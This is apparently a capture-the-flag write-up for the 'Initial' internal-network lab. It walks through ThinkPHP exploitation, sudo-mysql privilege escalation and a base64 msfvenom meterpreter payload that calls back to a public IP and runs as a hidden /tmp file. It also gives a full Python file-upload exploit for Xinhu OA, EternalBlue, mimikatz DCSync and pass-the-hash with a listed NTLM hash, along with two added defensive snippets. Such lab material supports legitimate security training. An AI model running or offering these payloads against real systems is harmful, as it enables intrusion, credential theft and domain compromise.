## References

https://blog.csdn.net/uuzeray/article/details/141316323
https://9anux.org/2024/08/01/春秋云境Initial详解/index.html
## Environment & tools

VPS running Ubuntu: install msf, frp and fscan.

Local machine: install the ThinkPHP "Lianhua" (莲花) tool and AntSword (蚁剑).
## flag01

Visiting the IP shows a ThinkPHP service.

Run it through the Lianhua ThinkPHP tool in one go, then connect with AntSword.

Reading /root requires privilege escalation.

There are no exploitable SUID binaries, so go for sudo privilege escalation.

The output here shows mysql, meaning the current user can run the mysql command as root.

First locate the flag (the `\!` escape in the mysql client runs a shell command as root):

```bash
sudo mysql -e '\! find / -type f -name "*flag*" 2>/dev/null'
```

Then read the file:

```bash
sudo mysql -e '\! cat /root/flag/flag01.txt'
```

First flag:

flag{60b53231-
## flag02

Get a reverse shell with msf.

First start a listener on the VPS:

```bash
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST your-public-or-internal-IP   # <- must be changed! e.g. 192.168.1.100 or 47.92.x.x
set LPORT 6666
exploit
```

Generate the base64-encoded reverse-shell binary to run on the target:

```bash
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=47.109.49.107 LPORT=6666 -f elf | base64 -w 0
```

Output:

```
f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgAaCi9tMWtRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==
```

Copy it to the target and run it:

```bash
sudo mysql -e '\! echo "f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgAaCi9tMWtRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==" | base64 -d > /tmp/.X; chmod +x /tmp/.X; /tmp/.X &'
```
Upload fscan and scan the internal network for services.

First get the current IP, then scan for services.

Scan results:

- 172.22.1.2  DC (domain controller)
- 172.22.1.21  MS17-010 (EternalBlue)
- 172.22.1.18 ?m=login  Xinhu OA system

Set up an frp tunnel into the internal network.

Screenshot: https://pic1.imgdb.cn/item/694a08a112468c0fdca41a67.png

frpc.toml details:

```toml
serverAddr = "vps-ip"
serverPort = 7000

[[proxies]]
name = "web_test"
type = "tcp"
localIP = "172.22.1.18"
localPort = 80
remotePort = 8081
```
Attack Xinhu OA with the exploit:

```python
import requests

session = requests.Session()
session.verify = False
session.headers.update({
    "User-Agent": "Mozilla/5.0"
})
url_pre = "http://47.109.49.107:8081"

# 1. Log in
login_url = url_pre + "/?a=check&m=login&d=&ajaxbool=true"
login_data = {
    "rempass": "0",
    "jmpass": "false",
    "device": "1625884034525",
    "ltype": "0",
    "adminuser": "YWRtaW4=::",   # admin
    "adminpass": "YWRtaW4xMjM=",  # admin123
    "yanzm": ""
}
r = session.post(login_url, data=login_data)
print("\n[+] Login status:", r.status_code)
print("[+] Login response:")
print(r.text)
# If this is not JSON, there is basically nothing more to do
try:
    login_json = r.json()
except ValueError:
    print("[-] Login did not return JSON, stop.")
    exit()

# 2. Upload
upload_url = url_pre + "/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true"
files = {
    # Some CMSes call the field "file", others "filedata"; try both if needed
    "file": ("1.php", open("1.php", "rb"), "image/jpeg")
}
r = session.post(upload_url, files=files)
print("\n[+] Upload status:", r.status_code)
print("[+] Upload headers:", r.headers.get("Content-Type"))
print("[+] Upload response:")
print(r.text)
# Force-parse the JSON
try:
    upload_json = r.json()
except ValueError:
    print("[-] Upload did not return JSON, stop.")
    exit()
print("[+] Upload JSON keys:", upload_json.keys())
# Fall back across the common field names
file_id = upload_json.get("id") or upload_json.get("fileid")
filepath = upload_json.get("filepath") or upload_json.get("path")
print("[+] file_id:", file_id)
print("[+] filepath:", filepath)
if not file_id:
    print("[-] No file_id, cannot continue")
    exit()

# 3. Trigger task.php
task_url = url_pre + f"/task.php?m=qcloudCos|runt&a=run&fileid={file_id}"
r = session.get(task_url)
print("\n[+] Task trigger status:", r.status_code)
print("[+] Task response:")
print(r.text)

# 4. Try to access the file directly (some environments do not need the task step)
if filepath:
    if ".uptemp" in filepath:
        filepath = "/" + filepath.split(".uptemp")[0] + ".php"
    elif not filepath.startswith("/"):
        filepath = "/" + filepath
    shell_url = url_pre + filepath
    print("\n[+] Try access uploaded file:")
    print(shell_url)
    r = session.get(shell_url)
    print("[+] Shell access response:")
    print(r.text)
```

I attacked it with a script modified by AI; I don't know why the original one wouldn't work.

Connect with AntSword.

I couldn't find this path myself either; I looked at a writeup for it.

flag02: 2ce3-4813-87d4-
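The upload step above works because the server accepts a `.php` file as long as the client labels it `image/jpeg`. As an added defensive example (not part of the original writeup or of Xinhu OA), this is the server-side check that would reject that request: the extension allowlist, the magic bytes and a server-chosen filename are what matter, and the client Content-Type is only logged. The `UPLOAD_DIR` path and the allowlist are assumptions.

```python
import secrets
import os

# Constructed allowlist: permitted extension -> magic bytes the file body must start with.
ALLOWED_TYPES = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# Assumption: a directory served as static files only, with no PHP handler mapped to it.
UPLOAD_DIR = "/srv/uploads"


def validate_upload(filename: str, content: bytes, client_content_type: str):
    """Return (accepted, detail): the server-side storage path on success, the reason otherwise.
    client_content_type is reported in the reason but never trusted; the exploit script above
    sends 1.php labelled as image/jpeg and must be caught by the checks below."""
    base = os.path.basename(filename)
    # Exactly one dot: blocks "x.php.jpg", "x.jpg.php" and extension-less names.
    if base.count(".") != 1 or base.startswith("."):
        return False, f"bad filename {base!r} (client claimed {client_content_type})"
    ext = os.path.splitext(base)[1].lower()
    # "1.php" fails here regardless of what the multipart Content-Type says.
    if ext not in ALLOWED_TYPES:
        return False, f"extension {ext!r} not allowed (client claimed {client_content_type})"
    if not any(content.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, f"body is not a valid {ext} image"
    # Defence in depth: a real image never needs a PHP open tag, so polyglots are dropped too.
    if b"<?php" in content or b"<?=" in content:
        return False, "PHP tag found inside image body"
    # The stored name is chosen by the server, so the client-supplied name never hits the filesystem.
    stored = secrets.token_hex(16) + ext
    return True, f"{UPLOAD_DIR}/{stored}"


if __name__ == "__main__":
    # Constructed requests: the first mirrors the exploit script's upload, the second is a benign image.
    for name, body, ctype in [
        ("1.php", b"<?php echo 1; ?>", "image/jpeg"),
        ("photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16, "image/jpeg"),
    ]:
        print(name, validate_upload(name, body, ctype))
```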
## flag03

First hit the EternalBlue host found in the initial scan.

SOCKS can only proxy "me connecting out to others"; frp / port forwarding is what lets "others connect back to me", which is why a bind payload is used here.

```bash
# 1. Background the current session
background
# 2. Use the EternalBlue exploit module
use exploit/windows/smb/ms17_010_eternalblue
# 3. Set the target IP
set RHOSTS 172.22.1.21
# 4. Set the payload to bind_tcp_uuid (bind-type, easier to connect to afterwards)
set payload windows/x64/meterpreter/bind_tcp_uuid
# 5. Run the exploit
exploit
```

After EternalBlue, go for the domain controller.

First obtain the credentials:

```
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` (benjamin@gentilkiwi.com)
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX (vincent.letoux@gmail.com)
  '#####'        > http://pingcastle.com / http://mysmartlogon.com
                 ***/
Success.
```

Then run DCSync; the goal is the NTLM hash of Administrator, or of any Domain Admin:

```
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
```
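A DCSync like the one above shows up on the domain controller as Security event 4662 where a principal that is not a DC asks for the two replication extended rights. As an added detection example (not part of the original writeup), the function below walks flattened 4662 records and flags exactly that; the sample lines, the allowlist of sync accounts and the key=value layout are constructed assumptions, not real xiaorang.lab logs.

```python
import re

# Extended-right GUIDs needed to pull directory replication data; DCSync requests these.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
# Assumption: non-DC accounts that replicate legitimately (e.g. a directory sync service account).
REPLICATION_ALLOWLIST = {"MSOL_sync"}

# Constructed, flattened key=value renderings of Security event 4662 for the xiaorang.lab domain.
SAMPLE_EVENTS = [
    "EventID=4662 SubjectUserName=DC$ SubjectDomainName=XIAORANG "
    "ObjectType=%{19195a5b-6da0-11d0-afd3-00c04fd930c9} "
    "Properties=%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}",
    "EventID=4662 SubjectUserName=Administrator SubjectDomainName=XIAORANG "
    "ObjectType=%{19195a5b-6da0-11d0-afd3-00c04fd930c9} "
    "Properties=%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}",
    "EventID=4662 SubjectUserName=alice SubjectDomainName=XIAORANG "
    "ObjectType=%{bf967aba-0de6-11d0-a285-00aa003049e2} "
    "Properties=%%7688 {bf967a86-0de6-11d0-a285-00aa003049e2}",
    "EventID=4624 SubjectUserName=alice LogonType=3",
]

GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}")


def parse_event(line: str) -> dict:
    """Split 'Key=value' tokens; tokens without '=' (the GUID list) belong to the previous key."""
    fields, last = {}, None
    for tok in line.split():
        if "=" in tok:
            last, val = tok.split("=", 1)
            fields[last] = val
        elif last:
            fields[last] += " " + tok
    return fields


def detect_dcsync(lines):
    """Return (subject, sorted replication GUIDs) for every 4662 whose subject requested
    replication rights and is neither a machine account (trailing '$') nor allowlisted.
    The '$' rule is coarse: a compromised DC account would pass it, so compare against the
    real DC list in production."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        subject = ev.get("SubjectUserName", "")
        if subject.endswith("$") or subject in REPLICATION_ALLOWLIST:
            continue
        rights = sorted(set(GUID_RE.findall(ev.get("Properties", "").lower())) & REPLICATION_RIGHTS)
        if rights:
            hits.append((subject, rights))
    return hits


if __name__ == "__main__":
    for subject, rights in detect_dcsync(SAMPLE_EVENTS):
        print(f"possible DCSync by {subject}: {', '.join(rights)}")
```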
Then do pass-the-hash:

```bash
msfconsole
use exploit/windows/smb/psexec
set RHOSTS 172.22.1.2
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:10cf89a850fb1cdbe6bb432b859164c8
set SMBDomain xiaorang.lab
set PAYLOAD windows/x64/meterpreter/bind_tcp
exploit
```

Read the flag:

```
more C:\Users\Administrator\flag\flag03.txt
```

flag03: e8f88d0d43d6}
## Summary & takeaways

- Basic structure of an internal network and the concept of a domain
- frp tunnelling into an internal network
- Basic msf usage
- The basic workflow of an internal network penetration test